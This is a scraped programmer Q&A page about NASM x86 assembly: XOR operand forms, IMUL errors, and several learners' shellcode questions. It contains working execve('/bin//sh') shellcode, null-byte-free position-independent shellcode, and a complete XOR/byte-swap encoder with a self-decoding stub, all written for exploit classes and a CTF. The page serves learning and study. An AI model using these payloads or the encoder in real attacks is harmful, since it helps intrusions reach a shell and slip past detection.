NASM XOR signature (32bit) - nasm

I was searching for the signature of the NASM XOR operation, but could not find it in the manual.
What is the signature of NASM's XOR operation? As in, what registers combination/addressing modes are possible when doing XOR X, Y? Is it limited to certain registers?

That's defined by the instruction set (x86), not by NASM. These are the valid forms of XOR (taken from Intel's Software Developer's Manual):
Opcode Instruction Op/En 64-Bit Mode Compat/Leg Mode Description
34 ib XOR AL, imm8 I Valid Valid AL XOR imm8.
35 iw XOR AX, imm16 I Valid Valid AX XOR imm16.
35 id XOR EAX, imm32 I Valid Valid EAX XOR imm32.
REX.W + 35 id XOR RAX, imm32 I Valid N.E. RAX XOR imm32 (sign-extended).
80 /6 ib XOR r/m8, imm8 MI Valid Valid r/m8 XOR imm8.
REX + 80 /6 ib XOR r/m8*, imm8 MI Valid N.E. r/m8 XOR imm8.
81 /6 iw XOR r/m16, imm16 MI Valid Valid r/m16 XOR imm16.
81 /6 id XOR r/m32, imm32 MI Valid Valid r/m32 XOR imm32.
REX.W + 81 /6 id XOR r/m64, imm32 MI Valid N.E. r/m64 XOR imm32 (sign-extended).
83 /6 ib XOR r/m16, imm8 MI Valid Valid r/m16 XOR imm8 (sign-extended).
83 /6 ib XOR r/m32, imm8 MI Valid Valid r/m32 XOR imm8 (sign-extended).
REX.W + 83 /6 ib XOR r/m64, imm8 MI Valid N.E. r/m64 XOR imm8 (sign-extended).
30 /r XOR r/m8, r8 MR Valid Valid r/m8 XOR r8.
REX + 30 /r XOR r/m8*, r8* MR Valid N.E. r/m8 XOR r8.
31 /r XOR r/m16, r16 MR Valid Valid r/m16 XOR r16.
31 /r XOR r/m32, r32 MR Valid Valid r/m32 XOR r32.
REX.W + 31 /r XOR r/m64, r64 MR Valid N.E. r/m64 XOR r64.
32 /r XOR r8, r/m8 RM Valid Valid r8 XOR r/m8.
REX + 32 /r XOR r8*, r/m8* RM Valid N.E. r8 XOR r/m8.
33 /r XOR r16, r/m16 RM Valid Valid r16 XOR r/m16.
33 /r XOR r32, r/m32 RM Valid Valid r32 XOR r/m32.
REX.W + 33 /r XOR r64, r/m64 RM Valid N.E. r64 XOR r/m64.
imm means an immediate, like 5 or 13 (or a label). r/m means either a register or a memory operand (e.g. al, bhand byte [foo] would all match r/m8.

Related

Intel x86 (IA32) assembly decoder stub for custom encoder not working as expected

I have written a custom encoder which encodes my shellcode in this way:
First it reverses(swaps) all adjacent bytes in the original shellcode, and then it XORs each byte with value "0xaa" - I did all sanity check to ensure my original shellcode doesn't have this value, which might break my shellcode (by causing bad characters as a result of the encode). Output of my encoder:
Original Shellcode( 25 Bytes) :
0x31,0xc0,0x50,0x68,0x2f,0x2f,0x6c,0x73,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x50,0x89,0xe2,0x53,0x89,0xe1,0xb0,0xb,0xcd,0x80,
Step1(Reverse adjacent Bytes)-Encoded Shellcode( 25 Bytes) :
0xc0,0x31,0x68,0x50,0x2f,0x2f,0x73,0x6c,0x2f,0x68,0x69,0x62,0x89,0x6e,0x50,0xe3,0xe2,0x89,0x89,0x53,0xb0,0xe1,0xcd,0xb,0x80,
Step2(XOR-each-BYTE-with-0xaa)-Encoded Shellcode( 25 Bytes) :
0x6a,0x9b,0xc2,0xfa,0x85,0x85,0xd9,0xc6,0x85,0xc2,0xc3,0xc8,0x23,0xc4,0xfa,0x49,0x48,0x23,0x23,0xf9,0x1a,0x4b,0x67,0xa1,0x2a,
My original shellcode's purpose: it just executes /bin/ls on Linux systems using the "execve" syscall. Full code:
global _start
section .text
_start:
; PUSH the first null dword
xor eax, eax
push eax
; PUSH //bin/sh (8 bytes)
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push eax
mov edx, esp
push ebx
mov ecx, esp
mov al, 11
int 0x80
In order to execute the shellcode I'm practicing how to write a decoder stub, which will decode my custom encoded shellcode, and then execute it on a target machine.
This is my decoder stub assembly code:
global _start
section .text
_start:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov cl, 12
jmp short call_decoder
; first : decode by XOR again with same value 0xaa
decode1:
pop esi
xor byte [esi], 0xaa
jz decode2
inc esi
jmp short decode1
; second: rearrange the reversed adjacent BYTES, as part of encoding
decode2:
pop esi
mov bl, byte [esi + eax]
mov dl, byte [esi + eax + 1]
xchg bl, dl
mov byte [esi + eax], bl
mov byte [esi + eax + 1], dl
add al, 2
loop decode2
; execute Shellcode
jmp short Shellcode
call_decoder:
call decode1
; an extra byte 0xaa added at the end of encoded shellcode, as a marker to end of shellcode bytes.
Shellcode: db 0x6a,0x9b,0xc2,0xfa,0x85,0x85,0xd9,0xc6,0x85,0xc2,0xc3,0xc8,0x23,0xc4,0xfa,0x49,0x48,0x23,0x23,0xf9,0x1a,0x4b,0x67,0xa1,0x2a,0xaa
But above code gives me a segment fault. I'm unable to find a failure point on gdb debugger. Need some help on what I'm doing wrong.
Based on comments made by #prl, these are the changes I did in my decoder stub, and now it works as expected:
global _start
section .text
; initialize registers
_start:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov cl, 12
jmp short call_decoder
; set starting address of Shellcode in esi register
decoder:
pop esi
mov edi, esi
; first: decode by XOR again with same value 0xaa
decode1:
xor byte [edi], 0xaa
jz decode2
inc edi
jmp short decode1
; second: rearrange the reversed adjacent BYTES, as part of encoding
decode2:
mov bl, byte [esi + eax]
mov dl, byte [esi + eax + 1]
xchg bl, dl
mov byte [esi + eax], bl
mov byte [esi + eax + 1], dl
add al, 2
loop decode2
jmp short Shellcode
call_decoder:
call decoder
Shellcode: db 0x6a,0x9b,0xc2,0xfa,0x85,0x85,0xd9,0xc6,0x85,0xc2,0xc3,0xc8,0x23,0xc4,0xfa,0x49,0x48,0x23,0x23,0xf9,0x1a,0x4b,0x67,0xa1,0x2a,0xaa
EDIT2 :
A much concise and a better looking code - also no need to hardcode the length of Shellcode:
global _start
section .text
_start:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
jmp short call_decoder
decoder:
pop esi
mov cl, codeLen
dec cl
decode:
cmp al, cl
jz last_byte_odd
xor byte [esi + eax], 0xaa
mov bl, byte [esi + eax]
xor byte [esi + eax + 1], 0xaa
xchg byte [esi + eax + 1], bl
mov byte [esi + eax], bl
add al, 1
cmp al, cl
jz Shellcode
add al, 1
jmp short decode
last_byte_odd:
xor byte [esi + eax], 0xaa
jmp short Shellcode
call_decoder:
call decoder
Shellcode: db 0x6a,0x9b,0xc2,0xfa,0x85,0x85,0xd9,0xc6,0x85,0xc2,0xc3,0xc8,0x23,0xc4,0xfa,0x49,0x48,0x23,0x23,0xf9,0x1a,0x4b,0x67,0xa1,0x2a
codeLen equ $-Shellcode
I leave it up to the low level and shell-coding enthusiasts, to decipher the logic.

Swapping 2 integers in an array with inline assembly results in weird memory values

int Perm[4326];
__asm
{ MOV EBX, 6
FACT: MOV Perm[4320 + EBX * 4], EBX
DEC EBX
TEST EBX, EBX
JE FACTEND
JMP FACT
FACTEND: // This puts the numbers 1,2,3,4,5,6 in Perm[4320]...Perm[4325]
//In between there are is some recursion that's not relevant
MOV EBX, 2
XOR ESI,ESI
MOV EAX, Perm[EBX*4+4319]
TEST AL,1
JZ EVEN
MOV ECX, Perm[4320]
MOV Perm[4320], EAX
MOV Perm[EBX * 4 + 4319], ECX
JMP KLOOP
EVEN: MOV ECX, Perm[ESI * 4 + 4320]
MOV Perm[ESI*4 + 4320], EAX
MOV Perm[EBX * 4 + 4319], ECX
KLOOP: INC ESI
The memory looks like this from Perm[4321] to Perm [4325] :
01000000 02000000 03000000 04000000 05000000 06000000
What I'm struggling with is that
MOV EAX, Perm[EBX*4+4319] Results in EAX being 00000002
While MOV ECX Perm[4320*4] Results in ECX being 01000000
And the after the swap (EVEN label) the memory becomes
00000002 00000000 03010000 04000000 05000000 06000000
I am trying to implement in assembly the Heap algorithm for permutations of an array, in this case an array of int.
With this being little endian it doesn't make sense that 1 would be written as 01000000 in the memory since it should be 00 00 00 01 , I also don't understand why I'm getting 2 different results with seemingly the same instruction (MOV EAX, Perm and MOV ECX, Perm)

NASM Segmentation fault

I'm using a 64-bit Ubuntu 18.04.3 LTS VM and I'm trying to write a simple x64 assembly code that will print "Owned!!!".
Because I don't want any 0x00 or 0x0a bytes and I want the code to be position independent (because I'm learning how to write shellcodes), I wrote it this way:
;hello4.asm attempts to make the code position independent
section .text
global _start
_start:
;clear out the registers we are going to need
xor rax, rax
xor rbx, rbx
xor rcx, rcx
xor rdx, rdx
;write(int fd, char *msg, unsigned int len)
mov al, 4
mov bl, 1
;Owned!!! = 4f,77,6e,65,64,21,21,21
;push !,!,!,d
push 0x21212164
;push e,n,w,O
push 0x656e774f
mov rcx, rsp
mov dl, 8
int 0x80
;exit(int ret)
mov al,1
xor rbx, rbx
int 0x80
This is the output that I'm getting:
user#PC:~/Desktop/exploitsclass/hello_shellcode$ nasm -f elf64 hello4.asm
user#PC:~/Desktop/exploitsclass/hello_shellcode$ ld hello4.o -o hello4
user#PC:~/Desktop/exploitsclass/hello_shellcode$ objdump -d hello4 -M intel
hello4: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor rax,rax
400083: 48 31 db xor rbx,rbx
400086: 48 31 c9 xor rcx,rcx
400089: 48 31 d2 xor rdx,rdx
40008c: b0 04 mov al,0x4
40008e: b3 01 mov bl,0x1
400090: 68 64 21 21 21 push 0x21212164
400095: 68 4f 77 6e 65 push 0x656e774f
40009a: 48 89 e1 mov rcx,rsp
40009d: b2 08 mov dl,0x8
40009f: cd 80 int 0x80
4000a1: b0 01 mov al,0x1
4000a3: 48 31 db xor rbx,rbx
4000a6: cd 80 int 0x80
user#PC:~/Desktop/exploitsclass/hello_shellcode$ ./hello4
Segmentation fault (core dumped)
How do I fix this?
UPDATE:
I've understood that int 0x80 is intended for 32-bit programs and I should use syscall instead and that syscall has different ids for each system call.
The new code is:
;hello4.asm attempts to make the code position independent
section .text
global _start
_start:
;clear out the registers we are going to need
xor rax, rax
xor rsi, rsi
xor rdi, rdi
xor rdx, rdx
;write(int fd, char *msg, unsigned int len)
mov al, 1
add di, 1
;Owned!!! = 4f,77,6e,65,64,21,21,21
;push !,!,!,d
push 0x21212164
;push e,n,w,O
push 0x656e774f
mov rsi, rsp
mov dl, 8
syscall
;exit(int ret)
mov al, 60
xor rdi, rdi
syscall
The output is Owne% instead of Owned!!! now.
It still needs to be fixed.
With the help of #CertainLach I've written the correct code:
;hello4.asm attempts to make the code position independent
section .text
global _start
_start:
;clear out the registers we are going to need
xor rax, rax
xor rsi, rsi
xor rdi, rdi
xor rdx, rdx
;write(int fd, char *msg, unsigned int len)
mov al, 1
add di, 1
;Owned!!! = 4f,77,6e,65,64,21,21,21
mov rsi, 0x21212164656e774f
push rsi
mov rsi, rsp
mov dl, 8
syscall
;exit(int ret)
mov al, 60
xor rdi, rdi
syscall
This code contains no null bytes or 0x0a bytes and it's position-independent, as following:
user#PC:~/Desktop/exploitsclass/hello_shellcode$ objdump -d hello4 -M intel
hello4: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor rax,rax
400083: 48 31 f6 xor rsi,rsi
400086: 48 31 ff xor rdi,rdi
400089: 48 31 d2 xor rdx,rdx
40008c: b0 01 mov al,0x1
40008e: 66 83 c7 01 add di,0x1
400092: 48 be 4f 77 6e 65 64 movabs rsi,0x21212164656e774f
400099: 21 21 21
40009c: 56 push rsi
40009d: 48 89 e6 mov rsi,rsp
4000a0: b2 08 mov dl,0x8
4000a2: 0f 05 syscall
4000a4: b0 3c mov al,0x3c
4000a6: 48 31 ff xor rdi,rdi
4000a9: 0f 05 syscall
This is also a correct way of implementing the solution, which is 1 bytecode less, but with more memory consumption:
user#PC:~/Desktop/exploitsclass/hello_shellcode$ cat hello4.asm
;hello4.asm attempts to make the code position independent
section .text
global _start
_start:
;clear out the registers we are going to need
xor rax, rax
xor rsi, rsi
xor rdi, rdi
xor rdx, rdx
;write(int fd, char *msg, unsigned int len)
mov al, 1
add di, 1
;Owned!!! = 4f,77,6e,65,64,21,21,21
;push !,!,!,d
push 0x21212164
;push e,n,w,O
push 0x656e774f
mov rsi, rsp
mov dl, 16
syscall
;exit(int ret)
mov al, 60
xor rdi, rdi
syscall
user#PC:~/Desktop/exploitsclass/hello_shellcode$ objdump -d hello4 -M intel
hello4: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor rax,rax
400083: 48 31 f6 xor rsi,rsi
400086: 48 31 ff xor rdi,rdi
400089: 48 31 d2 xor rdx,rdx
40008c: b0 01 mov al,0x1
40008e: 66 83 c7 01 add di,0x1
400092: 68 64 21 21 21 push 0x21212164
400097: 68 4f 77 6e 65 push 0x656e774f
40009c: 48 89 e6 mov rsi,rsp
40009f: b2 10 mov dl,0x10
4000a1: 0f 05 syscall
4000a3: b0 3c mov al,0x3c
4000a5: 48 31 ff xor rdi,rdi
4000a8: 0f 05 syscall
Thank you so much!
Can't answer your comment, you can't just change int 0x80 to syscall to make it work, system call numbers differ, i.e sys_write you have here, have id 4 for int 0x80, and id 1 with syscall
Here you can see numbers for syscall
And here for int 0x80

Why don't some shellcode in PicoCTF Shellz work even though it means the same as those which do?

I am trying to understand the shellcode solution to this CTF problem.
0: 31 c9 xor ecx,ecx
2: f7 e1 mul ecx
4: b0 0b mov al,0xb
6: 51 push ecx
7: 68 2f 2f 73 68 push 0x68732f2f
c: 68 2f 62 69 6e push 0x6e69622f
11: 89 e3 mov ebx,esp
13: cd 80 int 0x80
My understanding of the shellcode is as follows:
ecx is set to 0.
eax *= ecx, so eax = 0
The lower 8 bits of eax (ie al) is set to 0xb : opcode for execve().
"/bin//sh" is pushed to the stack. Its pointer is put in ebx (first argument of execve).
int 0x80 is the syscall interrupt. We run execve("/bin//sh") and the shell is open for us to use.
The arch seems to be i386 the way the registers are named. Definitely 32 bits.
What I do not understand is as follows:
Why is it when I replace mul ecx with mov eax, 0x0 or xor eax, eax, the shell does not spawn? Don't they all set eax to 0? When I replaced only xor ecx, ecx with mov ecx, 0x0 and it worked fine.
When I replaced mov al, 0xb with mov eax, 0xb, it worked fine. But when I subsequently removed mul ecx, it didnt work anymore. Why is mul ecx necessary? If I change the entire eax value to 0xb, doesn't that mean i dont need to set it to 0 first? I'm guessing the original shellcode has to because it only sets the lower 8 bits of eax to 0xb (mov al, 0xb). So the higher 24 bits needs to be 0.
Thanks for the help guys.

Nasm - Imul doesn't work

I created a program that count a factorial. Everything should be ok, except a multiplication. I have no idea what kind of mistake I made. Below I'll show you a debugger statement:
error: invalid combination of opcode and operands
part of program include multiplication (imul):
_middle:
cmp dil,1 ;; dil is the counter, sil contain the final result
jl _end
imul sil,dil ;; here is the problem
dec dil
jmp _middle
If necessary, I can post the rest of program.
The Intel manual lists the following variants of IMUL:
F6 /5 IMUL r/m8* M Valid Valid AX? AL * r/m byte.
F7 /5 IMUL r/m16 M Valid Valid DX:AX ? AX * r/m word.
F7 /5 IMUL r/m32 M Valid Valid EDX:EAX ? EAX * r/m32.
REX.W + F7 /5 IMUL r/m64 M Valid N.E. RDX:RAX ? RAX * r/m64.
0F AF /r IMUL r16, r/m16 RM Valid Valid word register ? word register * r/m16.
0F AF /r IMUL r32, r/m32 RM Valid Valid doubleword register ? doubleword register *
r/m32.
REX.W + 0F AF /r IMUL r64, r/m64 RM Valid N.E. Quadword register ? Quadword register *
r/m64.
6B /r ib IMUL r16, r/m16, imm8 RMI Valid Valid word register ? r/m16 * sign-extended
immediate byte.
6B /r ib IMUL r32, r/m32, imm8 RMI Valid Valid doubleword register ? r/m32 * signextended
immediate byte.
REX.W + 6B /r ib IMUL r64, r/m64, imm8 RMI Valid N.E. Quadword register ? r/m64 * sign-extended
immediate byte.
69 /r iw IMUL r16, r/m16, imm16 RMI Valid Valid word register ? r/m16 * immediate word.
69 /r id IMUL r32, r/m32, imm32 RMI Valid Valid doubleword register ? r/m32 * immediate
doubleword.
REX.W + 69 /r id IMUL r64, r/m64, imm32 RMI Valid N.E. Quadword reg
You're supplying two 8-bit registers as operands, but as you can see in the above table there's no such variant of IMUL.
You could do something like:
mov al,dil
imul sil
; The result will be in AX

Resources